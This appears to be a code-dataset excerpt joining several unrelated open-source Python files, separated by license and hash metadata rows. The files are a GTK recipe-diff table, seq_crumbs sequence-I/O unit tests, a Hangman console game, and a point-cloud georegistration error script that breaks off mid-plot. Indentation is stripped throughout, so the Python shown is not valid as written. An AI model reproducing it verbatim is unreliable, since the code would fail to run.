diffs = recipeIdentifier.diff_recipes(self.rd, recs)
idiffs = recipeIdentifier.diff_ings(self.rd, r1, r2)
if diffs:
return DiffTable(diffs,recs[0])
else:
return None
class DiffTable (Gtk.Table):
"""A Table displaying differences in a recipe.
diff_dic is a dictionary with the differences.
{'attribute':(VAL1,VAL2,...)}
recipe_object is a recipe object representing one of our duplicate
recs, from which we can grab attributes that are not different.
dont_choose is a list of attributes whose differences are
displayed, but where no choice is offered (such as modification
time for the recipe).
"""
def __init__ (self, diff_dic, recipe_object=None, parent=None,
dont_choose=[]):
self.idiffs = []
self.diff_dic = diff_dic
Gtk.Table.__init__(self)
self.selected_dic = {}
self.set_col_spacings(6)
self.set_row_spacings(6)
self.row = 0
self.max_cols = 1
for attr,name,typ in [('last_modified','Last Modified',None)] + gglobals.REC_ATTRS \
+ [('image','Image',None)] \
+ [(attr,gglobals.TEXT_ATTR_DIC[attr],None) for attr in gglobals.DEFAULT_TEXT_ATTR_ORDER]:
if attr in diff_dic:
buttons = self.build_options(attr,self.diff_dic[attr])
label = Gtk.Label(label='_'+name+':')
label.set_alignment(0.0,0.5)
label.set_use_underline(True)
label.show()
self.attach(label,0,1,self.row,self.row+1,xoptions=Gtk.AttachOptions.SHRINK|Gtk.AttachOptions.FILL,yoptions=Gtk.AttachOptions.SHRINK|Gtk.AttachOptions.FILL)
target = None
for col,b in enumerate(buttons):
self.setup_widget_size(b,in_col=True)
b.show()
if not target:
target = b
label.set_mnemonic_widget(target)
self.attach(b,col+1,col+2,self.row,self.row+1,xoptions=Gtk.AttachOptions.SHRINK|Gtk.AttachOptions.FILL,yoptions=Gtk.AttachOptions.SHRINK|Gtk.AttachOptions.FILL)
if col > self.max_cols: self.max_cols = col
self.row += 1
elif recipe_object and hasattr(recipe_object,attr) and getattr(recipe_object,attr):
att_label = Gtk.Label(label=name+':')
att_label.set_use_underline(True)
att_label.set_alignment(0,0.5)
att_label.show()
constructor = get_display_constructor(attr)
val = getattr(recipe_object,attr)
val_label = constructor(getattr(recipe_object,attr))
val_label.show()
self.setup_widget_size(val_label,False)
if hasattr(val_label,'set_alignment'): val_label.set_alignment(0,0.5)
self.attach(att_label,0,1,self.row,self.row+1,xoptions=Gtk.AttachOptions.SHRINK|Gtk.AttachOptions.FILL,yoptions=Gtk.AttachOptions.SHRINK|Gtk.AttachOptions.FILL)
self.attach(val_label,1,5,self.row,self.row+1,xoptions=Gtk.AttachOptions.SHRINK|Gtk.AttachOptions.FILL,yoptions=Gtk.AttachOptions.SHRINK|Gtk.AttachOptions.FILL)
self.row += 1
self.mm = mnemonic_manager.MnemonicManager()
self.mm.add_toplevel_widget(self)
self.mm.fix_conflicts_peacefully()
self.rec = recipe_object.id
def setup_widget_size (self, w, in_col=True):
if in_col:
w.set_size_request(230,-1)
else:
w.set_size_request(650,-1)
def build_options (self, attribute, values):
buttons = []
group_rb = None
make_widget = get_display_constructor(attribute)
for v in values:
rb = Gtk.RadioButton(group=group_rb)
if not group_rb: group_rb = rb
if v is not None:
rb.add(make_widget(v))
else:
rb.add(Gtk.Label(label=_("None")))
rb.show_all()
buttons.append(rb)
rb.connect('toggled',self.value_toggled,attribute,v)
self.selected_dic[attribute] = values[0]
for n,v in enumerate(values):
if v:
buttons[n].set_active(True)
break
return buttons
def value_toggled (self, rb, attribute, v):
self.selected_dic[attribute] = v
def add_ingblocks (self, rd, recs):
#print 'add_ingblocks for ',[r.id for r in recs]
self.rd = rd
self.iblock_dic = {}
if len(recs) == 1:
blocks = recipeIdentifier.format_ingdiff_line(recipeIdentifier.format_ings(recs[0],self.rd))
self.iblock_dic[blocks[0]] = recs[0]
else:
blocks = []
rec_0 = recs[0]
for r in recs[1:]:
chunks = self.get_ing_text_blobs(rec_0,r)
if not chunks and not blocks:
# If there is no diff, in other words, and we
# don't yet have any block...
chunks = [recipeIdentifier.format_ings(recs[0],self.rd)]
elif not chunks:
# Otherwise if there are no diffs we just continue
# our loop...
continue
if not blocks:
blocks = [chunks[0]]
self.iblock_dic[blocks[0]] = rec_0
if chunks and len(chunks) > 1:
new_block = chunks[1]
if new_block not in blocks:
blocks.append(new_block)
self.iblock_dic[new_block] = r
group_rb = None
name = _('Ingredients')
if len(blocks) > 1:
lab = Gtk.Label(label='_'+_("Ingredients")); lab.set_use_underline(True)
for col,block in enumerate(blocks):
rb = Gtk.RadioButton(
label=_("Recipe")+ ' ' +'%i'%(col+1),
group=group_rb
)
if not group_rb:
group_rb = rb
lab.set_mnemonic_widget(rb)
if not block:
rb.add(Gtk.Label(label=_("None")))
else:
for n,txt in enumerate(block):
l = Gtk.Label(label=txt)
l.set_alignment(0.0,0.0)
l.set_use_markup(True)
l.set_line_wrap(True); l.set_line_wrap_mode(Pango.WrapMode.WORD)
l.show()
self.setup_widget_size(l,in_col=True)
self.attach(l,col+1,col+2,self.row+1+n,self.row+2+n,
xoptions=Gtk.AttachOptions.SHRINK|Gtk.AttachOptions.FILL,
yoptions=Gtk.AttachOptions.SHRINK|Gtk.AttachOptions.FILL)
#rb.add(l)
rb.connect('toggled',self.ing_value_toggled,block)
self.setup_widget_size(rb,in_col=True)
rb.show()
self.attach(rb,col+1,col+2,self.row,self.row+1,xoptions=Gtk.AttachOptions.SHRINK|Gtk.AttachOptions.FILL,yoptions=Gtk.AttachOptions.SHRINK|Gtk.AttachOptions.FILL)
else:
lab = Gtk.Label(label=_("Ingredients")); lab.show()
l = Gtk.Label(label=blocks[0])
l.set_alignment(0.0,0.0)
l.set_use_markup(True)
l.set_line_wrap(True); l.set_line_wrap_mode(Pango.WrapMode.WORD)
l.show()
self.attach(l,1,5,self.row,self.row+1,xoptions=Gtk.AttachOptions.SHRINK|Gtk.AttachOptions.FILL,yoptions=Gtk.AttachOptions.SHRINK|Gtk.AttachOptions.FILL)
lab.set_alignment(0.0,0.0); lab.show()
self.attach(lab,0,1,self.row,self.row+1,xoptions=Gtk.AttachOptions.SHRINK|Gtk.AttachOptions.FILL,yoptions=Gtk.AttachOptions.SHRINK|Gtk.AttachOptions.FILL)
def ing_value_toggled (self, rb, block):
if rb.get_active():
#print 'RB clicked',rb,'for block',block
#print 'ING TOGGLED - REC = ',
self.rec = self.iblock_dic[block]
#print self.rec
def get_ing_text_blobs (self, r1, r2):
"""Return an ing-blurb for r1 and r2 suitable for display."""
idiff = recipeIdentifier.diff_ings(self.rd, r1, r2)
if idiff: self.idiffs.append(idiff)
def is_line (l):
return not (l == '<diff/>')
if idiff:
ret = []
for igroup in idiff:
ret.append((recipeIdentifier.format_ingdiff_line(i)
for i in filter(is_line,igroup)))
return ret
def put_text_in_scrolled_window(text: str) -> Gtk.ScrolledWindow:
sw = Gtk.ScrolledWindow()
tv = Gtk.TextView()
sw.add(tv)
tv.get_buffer().set_text(text)
tv.set_editable(False)
tv.set_wrap_mode(Gtk.WrapMode.WORD)
sw.set_policy(Gtk.PolicyType.NEVER,Gtk.PolicyType.AUTOMATIC)
tv.show()
return sw
def make_text_label(text: str, use_markup: bool = False) -> Union[Gtk.Label, Gtk.ScrolledWindow]:
if not text:
return Gtk.Label(label=_('None'))
elif len(text) < 30:
return Gtk.Label(label=text)
elif len(text) < 250:
label = Gtk.Label(label=text)
if use_markup:
label.set_use_markup(use_markup)
label.set_line_wrap_mode(Pango.WrapMode.WORD)
return label
else:
return put_text_in_scrolled_window(text)
def get_display_constructor (attribute):
if attribute == 'rating':
return lambda v: ratingWidget.StarImage(
ratingWidget.star_generator,
value=v,
upper=10)
elif attribute in ['preptime','cooktime']:
return lambda v: Gtk.Label(label=convert.seconds_to_timestring(v))
elif attribute=='image':
return lambda v: (v and Gtk.Label(label="An Image") or Gtk.Label(label="No Image"))
elif attribute in gglobals.DEFAULT_TEXT_ATTR_ORDER:
return make_text_label
elif attribute == 'last_modified':
return lambda v: Gtk.Label(label=time_to_text(v))
else:
return lambda v: v and Gtk.Label(label=v) or Gtk.Label(label=_('None'))
if __name__ == '__main__':
def test_in_window (widget):
"""Put widget in window and show it"""
w = Gtk.Window()
w.add(widget)
w.connect('delete-event',Gtk.main_quit)
w.show()
Gtk.main()
def test_difftable ():
class FakeRec:
pass
test_rec = FakeRec()
test_rec.title = 'Shloppidy Recipe'
test_data = {'rating':[4,7],
'category':['Dessert','Dessert, Cake'],
'cuisine':['American','All-American'],
'preptime':[6000,12000],
'cooktime':[6543,None]}
t = DiffTable(test_data,test_rec)
t.show()
test_in_window(t)
print(t.selected_dic)
def test_merger (rd, conflicts):
recs = [rd.get_rec(i) for i in conflicts]
rmerger = RecipeMerger(rd)
to_fill,conflict_dic = recipeIdentifier.merge_recipes(rd,recs)
if conflict_dic:
dt = rmerger.uiMergeRecipes(recs)
dt.show()
test_in_window(dt)
print(dt.selected_dic)
elif to_fill:
print('Differences in ',conflicts,'can be auto-filled with',to_fill)
else:
print('No differences in ',conflicts)
rd = recipeManager.default_rec_manager()
rmd = RecipeMergerDialog(rd)
rmd.populate_tree()
rmd.show()
rmd.ui.get_object('window1').connect('delete-event',Gtk.main_quit)
Gtk.main()
#dups = rd.find_complete_duplicates()
#for d in dups[5:]:
# test_merger(rd,d)
|
gpl-2.0
| 6,182,747,767,306,343,000
| 39.464342
| 180
| 0.567932
| false
| 3.686011
| true
| false
| false
|
JoseBlanca/seq_crumbs
|
test/seq/test_seqio.py
|
1
|
10372
|
# Copyright 2012 Jose Blanca, Peio Ziarsolo, COMAV-Univ. Politecnica Valencia
# This file is part of seq_crumbs.
# seq_crumbs is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# seq_crumbs is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with seq_crumbs. If not, see <http://www.gnu.org/licenses/>.
# pylint: disable=R0201
# pylint: disable=R0904
# pylint: disable=C0111
import os
import unittest
from cStringIO import StringIO
from tempfile import NamedTemporaryFile
from subprocess import Popen, PIPE
from Bio.SeqRecord import SeqRecord
from Bio.Seq import Seq
from crumbs.utils.test_utils import TEST_DATA_DIR
from crumbs.utils.bin_utils import BIN_DIR
from crumbs.seq.seqio import (guess_seq_type, fastaqual_to_fasta, seqio,
_write_seqrecords, _read_seqrecords,
_itemize_fastx, read_seqs, write_seqs)
from crumbs.utils.tags import SEQITEM, SEQRECORD
from crumbs.exceptions import IncompatibleFormatError, MalformedFile
FASTA = ">seq1\natctagtc\n>seq2\natctagtc\n>seq3\natctagtc\n"
QUAL = ">seq1\n30 30 30 30 30 30 30 30\n>seq2\n30 30 30 30 30 30 30 30\n"
QUAL += ">seq3\n30 30 30 30 30 30 30 30\n"
FASTQ = '@seq1\natcgt\n+\n?????\n@seq2\natcgt\n+\n?????\n@seq3\natcgt\n+\n'
FASTQ += '?????\n'
class SeqIOTest(unittest.TestCase):
'It tests the seqio functions'
@staticmethod
def _make_fhand(content=None):
'It makes temporary fhands'
if content is None:
content = ''
fhand = NamedTemporaryFile()
fhand.write(content)
fhand.flush()
return fhand
def test_guess_seq_type(self):
'It guesses if the sequence is nucleotide or protein'
fpath = os.path.join(TEST_DATA_DIR, 'arabidopsis_genes')
assert guess_seq_type(open(fpath)) == 'nucl'
fpath = os.path.join(TEST_DATA_DIR, 'pairend2.sfastq')
assert guess_seq_type(open(fpath)) == 'nucl'
@staticmethod
def test_fastaqual_to_fasta():
seq_fhand = StringIO('>seq1\nattct\n>seq2\natc\n')
qual_fhand = StringIO('>seq1\n2 2 2 2 2\n>seq2\n2 2 2\n')
out_fhand = NamedTemporaryFile()
fastaqual_to_fasta(seq_fhand, qual_fhand, out_fhand)
fastq = open(out_fhand.name).read()
assert fastq == "@seq1\nattct\n+\n#####\n@seq2\natc\n+\n###\n"
def test_seqio(self):
'It tets the seqio function'
# fastq to fasta
out_fhand = NamedTemporaryFile()
seqio([self._make_fhand(FASTQ)], out_fhand, 'fasta')
assert ">seq1\natcgt" in open(out_fhand.name).read()
# fastq to fastq-illumina
out_fhand = NamedTemporaryFile()
seqio([self._make_fhand(FASTQ)], out_fhand, 'fastq-illumina')
assert "@seq1\natcgt\n+\n^^^^" in open(out_fhand.name).read()
out_fhand = NamedTemporaryFile()
seqio([self._make_fhand(FASTQ), self._make_fhand(FASTQ)],
out_fhand, 'fastq-illumina')
assert "@seq3\natcgt\n+\n^^^^^\n@seq1" in open(out_fhand.name).read()
# fasta to fastq
out_fhand = NamedTemporaryFile()
try:
seqio([self._make_fhand(FASTA)], out_fhand, 'fastq')
self.fail("error previously expected")
except IncompatibleFormatError as error:
assert 'No qualities available' in str(error)
# bad_format fastq
bad_fastq_fhand = self._make_fhand(FASTQ + 'aklsjhdas')
try:
seqio([bad_fastq_fhand], out_fhand, 'fasta')
self.fail("error previously expected")
except MalformedFile as error:
assert 'Lengths of sequence and quality' in str(error)
# genbank to fasta
out_fhand = NamedTemporaryFile()
genbank_fhand = open(os.path.join(TEST_DATA_DIR, 'sequence.gb'))
seqio([genbank_fhand], out_fhand, 'fasta')
result = open(out_fhand.name).read()
assert '>NM_019354.2' in result
class ReadWriteSeqRecordsTest(unittest.TestCase):
'It writes seqrecords in a file'
def test_write_empy_seq(self):
'It does not write an empty sequence'
seq1 = SeqRecord(Seq('ACTG'), id='seq1')
fhand = StringIO()
_write_seqrecords([seq1, None, SeqRecord(Seq(''), id='seq2')], fhand,
file_format='fasta')
fhand.flush()
assert fhand.getvalue() == '>seq1\nACTG\n'
def test_read_fasta(self):
'It tests the reading of a fasta file'
fhand = StringIO('>seq1\nACTG\n')
assert not list(_read_seqrecords([fhand]))[0].description
class SimpleIOTest(unittest.TestCase):
'It tests the simple input and output read'
def test_singleline_itemizer(self):
fhand = StringIO('@s1\nACTG\n+\n1234\n' * 1100)
seqs = list(_itemize_fastx(fhand))
names = [seq[0] for seq in seqs]
assert len(names) == 1100
assert len(set([seq[1][1] for seq in seqs])) == 1
def test_fasta_itemizer(self):
'It tests the fasta itemizer'
fhand = StringIO('>s1\nACTG\n>s2 desc\nACTG\n')
seqs = list(_itemize_fastx(fhand))
assert seqs == [('s1', ['>s1\n', 'ACTG\n'], {}),
('s2', ['>s2 desc\n', 'ACTG\n'], {})]
# with several lines
fhand = StringIO('>s1\nACTG\nGTAC\n>s2 desc\nACTG\n')
seqs = list(_itemize_fastx(fhand))
assert seqs == [('s1', ['>s1\n', 'ACTGGTAC\n'], {}),
('s2', ['>s2 desc\n', 'ACTG\n'], {})]
# With empty lines
fhand = StringIO('>s1\nACTG\n\n>s2 desc\nACTG\n')
seqs = list(_itemize_fastx(fhand))
assert seqs == [('s1', ['>s1\n', 'ACTG\n'], {}),
('s2', ['>s2 desc\n', 'ACTG\n'], {})]
def test_fastq_itemizer(self):
'It tests the fasta itemizer'
fhand = StringIO('@s1\nACTG\n+\n1234\n@s2 desc\nACTG\n+\n4321\n')
seqs = list(_itemize_fastx(fhand))
assert seqs == [('s1', ['@s1\n', 'ACTG\n', '+\n', '1234\n'], {}),
('s2', ['@s2 desc\n', 'ACTG\n', '+\n', '4321\n'], {})]
# Empty line
fhand = StringIO('@s1\nACTG\n+\n1234\n\n@s2 desc\nACTG\n+\n4321\n')
seqs = list(_itemize_fastx(fhand))
assert seqs == [('s1', ['@s1\n', 'ACTG\n', '+\n', '1234\n'], {}),
('s2', ['@s2 desc\n', 'ACTG\n', '+\n', '4321\n'], {})]
# Empty line
fhand = StringIO('@s1\nACTG\nATTA\n+\n1234\n1234\n')
seqs = list(_itemize_fastx(fhand))
assert seqs == [('s1', ['@s1\n', 'ACTGATTA\n', '+\n', '12341234\n'],
{})]
def test_seqitems_io(self):
'It checks the different seq class streams IO'
fhand = StringIO('>s1\nACTG\n>s2 desc\nACTG\n')
seqs = list(read_seqs([fhand], prefered_seq_classes=[SEQITEM]))
assert seqs[0].kind == SEQITEM
fhand = StringIO()
write_seqs(seqs, fhand)
assert fhand.getvalue() == '>s1\nACTG\n>s2 desc\nACTG\n'
assert seqs[0].object.name == 's1'
# SeqRecord
fhand = StringIO('>s1\nACTG\n>s2 desc\nACTG\n')
seqs = list(read_seqs([fhand], prefered_seq_classes=[SEQRECORD]))
assert seqs[0].kind == SEQRECORD
fhand = StringIO()
write_seqs(seqs, fhand, 'fasta')
assert fhand.getvalue() == '>s1\nACTG\n>s2 desc\nACTG\n'
# seqitem not possible with different input and output formats
fhand = StringIO('>s1\nACTG\n>s2 desc\nACTG\n')
try:
seqs = list(read_seqs([fhand], out_format='fastq',
prefered_seq_classes=[SEQITEM]))
self.fail('ValueError expected')
except ValueError:
pass
fhand = StringIO('>s1\nACTG\n>s2 desc\nACTG\n')
seqs = list(read_seqs([fhand], out_format='fasta',
prefered_seq_classes=[SEQITEM]))
fhand = StringIO()
write_seqs(seqs, fhand)
assert fhand.getvalue() == '>s1\nACTG\n>s2 desc\nACTG\n'
class PipingTest(unittest.TestCase):
'It tests that we get no error when trying to write in a closed pipe'
def test_write_closed_pipe(self):
seq_fhand = NamedTemporaryFile(suffix='.fasta')
n_seqs = 1000
for i in range(n_seqs):
seq_fhand.write('>s\nACTG\n')
seq_fhand.flush()
in_fpath = seq_fhand.name
seq_head = os.path.join(BIN_DIR, 'seq_head')
process_seq = Popen([seq_head, '-n', str(n_seqs), in_fpath],
stdout=PIPE)
stdout = NamedTemporaryFile(suffix='.stdout')
process_head = Popen(['head', '-n', '1'], stdin=process_seq.stdout,
stdout=stdout)
process_seq.stdout.close() # Allow seq_head to receive a SIGPIPE if
# head exits.
process_head.communicate()
assert open(stdout.name).read() == '>s\n'
seq_fhand.close()
stdout.close()
# With SeqRecords
gb_fpath = os.path.join(TEST_DATA_DIR, 'sequence.gb')
gb_content = open(gb_fpath).read()
seq_fhand = NamedTemporaryFile(suffix='.gb')
n_seqs = 100
for i in range(n_seqs):
seq_fhand.write(gb_content)
seq_fhand.flush()
in_fpath = seq_fhand.name
process_seq = Popen([seq_head, '-n', str(n_seqs), in_fpath],
stdout=PIPE)
stdout = NamedTemporaryFile(suffix='.stdout')
process_head = Popen(['head', '-n', '1'], stdin=process_seq.stdout,
stdout=stdout)
process_seq.stdout.close() # Allow seq_head to receive a SIGPIPE if
# head exits.
process_head.communicate()
seq_fhand.close()
assert 'LOCUS' in open(stdout.name).read()
stdout.close()
if __name__ == '__main__':
#import sys;sys.argv = ['', 'SeqIOTest.test_guess_seq_type']
unittest.main()
|
gpl-3.0
| -4,225,053,976,801,928,000
| 38.139623
| 78
| 0.58253
| false
| 3.237203
| true
| false
| false
|
ishanatmuz/HangmanMinimalist
|
hangman.py
|
1
|
4431
|
import random
import string
import os
import platform
# Defining the text file containing the list of words
WORDLIST_FILENAME = "words.txt"
MAX_GUESSES = 8
def loadWords():
# Returns a list of valid words. Words are taken from the file words.txt
print "Loading word list from file..."
# Open file for reading with no buffering
inFile = open(WORDLIST_FILENAME, 'r', 0)
# Read the file in single line
line = inFile.readline()
# Split all the words separated by whitespaces
wordlist = string.split(line)
print " ", len(wordlist), "words loaded."
return wordlist
def chooseWord(wordlist):
# Choose a word at random which the user have to guess
return random.choice(wordlist)
def isWordGuessed(secretWord, lettersGuessed):
# Checking for the non-existence of any character from the secretWord
# The result is stored as True of False
result = True;
for secretLetter in secretWord:
if not secretLetter in lettersGuessed:
result = False;
break;
return result;
def getGuessedWord(secretWord, lettersGuessed):
# Returns the guessed word in a specific format
# Example - the word 'apple' with the guessed characters ['a', 'b','l','s','e']
# would look like this 'a_ _ l _ '
result = "'";
for letter in secretWord:
if letter in lettersGuessed:
result += letter;
else:
result += '_ ';
result += "'";
return result;
def getAvailableLetters(lettersGuessed):
# Return the list of letters that are available to be used
# The letters returned are in lowercase
availableLetters = string.ascii_lowercase;
for letter in lettersGuessed:
availableLetters = availableLetters.replace(letter, '');
return availableLetters;
def clearTerminal():
# Clears the terminal on which the output is being displayed.
# Works at least on Windows and Linux, I haven't tested it on Mac OS
if platform.system() == 'Windows':
os.system('cls')
else:
os.system('clear')
def hangman(secretWord):
# Total number of wrong guesses allowed is 8
numberOfGuesses = MAX_GUESSES
# The letters guessed by the user
lettersGuessed = {}
# Welcome message
print 'Welcome to the game, Hangman!'
print 'I am thinking of a word that is %s letters long.' %(str(len(secretWord)))
# Infinite loop which breaks from inside the loop's conditions
while True:
print '-------------'
if not isWordGuessed(secretWord, lettersGuessed):
# Word not guessed
if numberOfGuesses == 0:
# All guesses exhausted, end the game
print 'Sorry, you ran out of guesses. The word was %s.' %(secretWord)
break
else:
# Guesses left, Display guesses left and available letters
print 'You have %s guesses left.' %(str(numberOfGuesses))
print 'Available letters: %s' %(getAvailableLetters(lettersGuessed))
# Take input from the user
guessedLetter = raw_input('Please guess a letter: ')
# Clearing the terminal
# Can use and cannot use depending on the preference
clearTerminal()
if guessedLetter in lettersGuessed:
# Already guessed letter, display guessed word
print 'Oops! You\'ve already guessed that letter:%s' %(getGuessedWord(secretWord, lettersGuessed))
else:
# New guess, add to lettersGuessed
lettersGuessed[guessedLetter] = True
if guessedLetter not in secretWord:
# Wrong Guess, decrement number of guesses
print 'Oops! That letter is not in my word:%s' %(getGuessedWord(secretWord, lettersGuessed))
numberOfGuesses -= 1
else:
# Correct guess
print 'Good guess:%s' %(getGuessedWord(secretWord, lettersGuessed))
else:
# Word guessed
print 'Congratulations, you won!'
break
# Execution sequence of the game
# Load the words from file
wordlist = loadWords()
# Choose a secret word for the user to guess
secretWord = chooseWord(wordlist).lower()
# Start the game for user
hangman(secretWord)
|
mit
| 7,097,529,540,876,522,000
| 36.880342
| 118
| 0.61995
| false
| 4.314508
| false
| false
| false
|
mirestrepo/voxels-at-lems
|
registration_eval/results/compute_trans_geo_accuracy.py
|
1
|
13935
|
#!/usr/bin/env python
# encoding: utf-8
"""
compute_transformation_error.py
Created by Maria Isabel Restrepo on 2012-09-24.
Copyright (c) 2012 . All rights reserved.
This script computes the distances betweeen an estimated similarity transformation and its ground truth
The transformation is used to transform a "source" coordinate system into a "target coordinate system"
To compute the error between the translations, the L2 norm diference translation vectors in the
"source coordinate system" is computed. Since distances are preserved under R and T, only scale is applied.
The rotation error is computed as the half angle between the normalized queternions i.e acos(|<q1,q2>|) in [0, pi/2]
"""
import os
import sys
import logging
import argparse
import vpcl_adaptor as vpcl
import numpy as np
from numpy import linalg as LA
import transformations as tf
import math
import matplotlib.pyplot as plt
sys.path.append(os.pardir)
import reg3d_transformations as reg3d_T
LOG = None
"""Compute the accuracy between the LIDAR fiducial points
and corresponding geo-register correspondances"""
def compute_ref_accuracy(fid_path, original_corrs_path,
geo_tform):
#Load fiducial .ply
fid = open(fid_path, 'r')
fid_points = np.genfromtxt(fid, dtype=float, delimiter=' ',
skip_header=9)
fid.close()
#Load original corrs .ply
fid = open(original_corrs_path, 'r')
original_corrs = np.genfromtxt(fid, dtype=float,
delimiter=' ', skip_header=9)
fid.close()
#Load transformation
#************GEO**************"
Tfis = open(geo_tform, 'r')
lines = []
lines = Tfis.readlines()
scale_geo = float(lines[0])
Ss_geo = tf.scale_matrix(scale_geo)
quat_line = lines[1].split(" ")
quat_geo = np.array([float(quat_line[3]), float(quat_line[0]),
float(quat_line[1]), float(quat_line[2])])
Rs_geo = tf.quaternion_matrix(quat_geo)
trans_line = lines[2].split(" ")
trans_geo = np.array([float(trans_line[0]), float(trans_line[1]),
float(trans_line[2])])
Tfis.close()
Hs_geo = Rs_geo.copy()
Hs_geo[:3, 3] = trans_geo[:3]
Hs_geo = Ss_geo.dot(Hs_geo)
LOG.debug("\n******Geo***** \n Scale: \n%s \nR:\n%s \nT:\n%s \nH:\n%s",
Ss_geo, Rs_geo, trans_geo, Hs_geo)
#Compute the "reference error"
#i.e. fiducial points - geo registered correspondances
npoints, c = fid_points.shape
if npoints != 30:
LOG.warn("Number of fiducial point is NOT 30")
if c != 3:
LOG.error("Fiducial points has the wrong number of dimensions")
# import code; code.interact(local=locals())
fid_points_hom = np.hstack((fid_points, np.ones([npoints, 1]))).T
original_corrs_hom = np.hstack((original_corrs, np.ones([npoints, 1]))).T
geo_corrs_hom = Hs_geo.dot(original_corrs_hom)
geo_ref_diff = geo_corrs_hom - fid_points_hom
# import pdb; pdb.set_trace()
delta_z = np.sqrt(geo_ref_diff[2, :] * geo_ref_diff[2, :])
delta_r = np.sqrt(geo_ref_diff[0, :] * geo_ref_diff[0, :] +
geo_ref_diff[1, :] * geo_ref_diff[1, :])
return delta_z, delta_r
def compute_geo_accuracy(fid_path, original_corrs_path,
geo_tform, trials_root, desc_name,
niter, ntrials, percentile=99):
#Load fiducial .ply
fid = open(fid_path, 'r')
fid_points = np.genfromtxt(fid, delimiter=' ',
skip_header=9)
fid.close()
#Load original corrs .ply
fid = open(original_corrs_path, 'r')
original_corrs = np.genfromtxt(fid, delimiter=' ', skip_header=9)
fid.close()
#load the geo tranformation
GEO = reg3d_T.geo_transformation(geo_tform);
#Compute the "reference error"
#i.e. fiducial points - geo registered correspondances
npoints, c = fid_points.shape
if npoints != 30:
LOG.warn("Number of fiducial point is NOT 30")
if c != 3:
LOG.error("Fiducial points has the wrong number of dimensions")
# import code; code.interact(local=locals())
fid_points_hom = np.hstack((fid_points, np.ones([npoints, 1]))).T
original_corrs_hom = np.hstack((original_corrs, np.ones([npoints, 1]))).T
geo_corrs_hom = GEO.transform_points(original_corrs_hom)
geo_ref_diff = geo_corrs_hom - fid_points_hom
# import pdb; pdb.set_trace()
delta_z = (geo_ref_diff[2, :] **2) ** (1./2.)
delta_r = (geo_ref_diff[0, :] **2 + geo_ref_diff[1, :] **2 )** (1./2.)
delta_z_ia = np.zeros([ntrials, npoints])
delta_r_ia = np.zeros([ntrials, npoints])
delta_z_icp = np.zeros([ntrials, npoints])
delta_r_icp = np.zeros([ntrials, npoints])
for trial in range(0, ntrials):
print "********Trial", trial, "**********"
#Load the transformations for this trial
#************Hs**************#
#read source to target "Ground Truth" Transformation
Tfile = trials_root + "/trial_" + str(trial) + "/Hs_inv.txt"
GT_Tform = reg3d_T.gt_transformation(Tfile)
src_features_dir = (trials_root + "/trial_" + str(trial) +
"/" + desc_name)
Tfile_ia = (src_features_dir + "/ia_transformation_" +
str(percentile) + "_" + str(niter) + ".txt")
Tfile_icp = (src_features_dir + "/icp_transformation_" +
str(percentile) + "_" + str(niter) + ".txt")
REG_Tform = reg3d_T.pcl_transformation(Tfile_ia, Tfile_icp)
Hs_ia_error = REG_Tform.Hs_ia.dot(GT_Tform.Hs)
Hs_icp_error = REG_Tform.Hs_icp.dot(GT_Tform.Hs)
# transform the points with the residual transformations
ia_corrs_hom = Hs_ia_error.dot(original_corrs_hom)
icp_corrs_hom = Hs_icp_error.dot(original_corrs_hom)
# geo-register
geo_ia_corrs_hom = GEO.transform_points(ia_corrs_hom)
geo_icp_corrs_hom = GEO.transform_points(icp_corrs_hom)
# distances
geo_ia_ref_diff = geo_ia_corrs_hom - fid_points_hom
geo_icp_ref_diff = geo_icp_corrs_hom - fid_points_hom
delta_z_ia[trial, :] = np.sqrt(geo_ia_ref_diff[2, :] ** 2)
delta_r_ia[trial, :] = np.sqrt(geo_ia_ref_diff[0, :] ** 2 +
geo_ia_ref_diff[1, :] ** 2 )
delta_z_icp[trial, :] = np.sqrt(geo_icp_ref_diff[2, :] ** 2)
delta_r_icp[trial, :] = np.sqrt(geo_icp_ref_diff[0, :] ** 2 +
geo_icp_ref_diff[1, :] ** 2)
# import pdb; pdb.set_trace()
return delta_z, delta_r,\
delta_z_ia, delta_r_ia, \
delta_z_icp, delta_r_icp
def main(logfile=None):
global LOG
LOG = setlogging(logfile)
descriptors = ["FPFH_30", "SHOT_30"]
niter = 500;
ntrials = 10;
plot_errors = True;
if (plot_errors):
colors = ['magenta','green'];
markers = ['o', 's', '*', '+', '^', 'v']
fid_path = "/data/lidar_providence/downtown_offset-1-financial-dan-pts1.ply"
original_corrs_path = "/data/lidar_providence/downtown_offset-1-financial-dan-pts0.ply"
trials_root = "/Users/isa/Experiments/reg3d_eval/downtown_dan";
geo_tform = "/data/lidar_providence/downtown_offset-1-financial-dan-Hs.txt"
for d_idx in range(0, len(descriptors)):
desc_name = descriptors[d_idx]
delta_z, delta_r, \
delta_z_ia, delta_r_ia, \
delta_z_icp, delta_r_icp = compute_geo_accuracy(fid_path,
original_corrs_path,
geo_tform, trials_root, desc_name,
niter, ntrials)
#sort errors for all trials to get the 70 80 90 % errors
delta_z_ia.sort(axis=0)
delta_r_ia.sort(axis=0)
delta_z_icp.sort(axis=0)
delta_r_icp.sort(axis=0)
CE_70_ia = delta_r_ia[int(0.7 * ntrials) - 1, :]
CE_80_ia = delta_r_ia[int(0.8 * ntrials) - 1, :]
CE_90_ia = delta_r_ia[int(0.9 * ntrials) - 1, :]
LE_70_ia = delta_z_ia[int(0.7 * ntrials) - 1, :]
LE_80_ia = delta_z_ia[int(0.8 * ntrials) - 1, :]
LE_90_ia = delta_z_ia[int(0.9 * ntrials) - 1, :]
CE_70_icp = delta_r_icp[int(0.7 * ntrials) - 1, :]
CE_80_icp = delta_r_icp[int(0.8 * ntrials) - 1, :]
CE_90_icp = delta_r_icp[int(0.9 * ntrials) - 1, :]
LE_70_icp = delta_z_icp[int(0.7 * ntrials) - 1, :]
LE_80_icp = delta_z_icp[int(0.8 * ntrials) - 1, :]
LE_90_icp = delta_z_icp[int(0.9 * ntrials) - 1, :]
if (plot_errors):
#Plot CE and LE
fig_ia_CE = plt.figure()
ax_ia_CE = fig_ia_CE.add_subplot(111);
plt.hold(True);
plt.axis(tight=True);
ax_ia_CE.plot(CE_70_ia, "--s", color="green", label= "CE_70");
ax_ia_CE.plot(CE_80_ia, "--^", color="magenta", label= "CE_80");
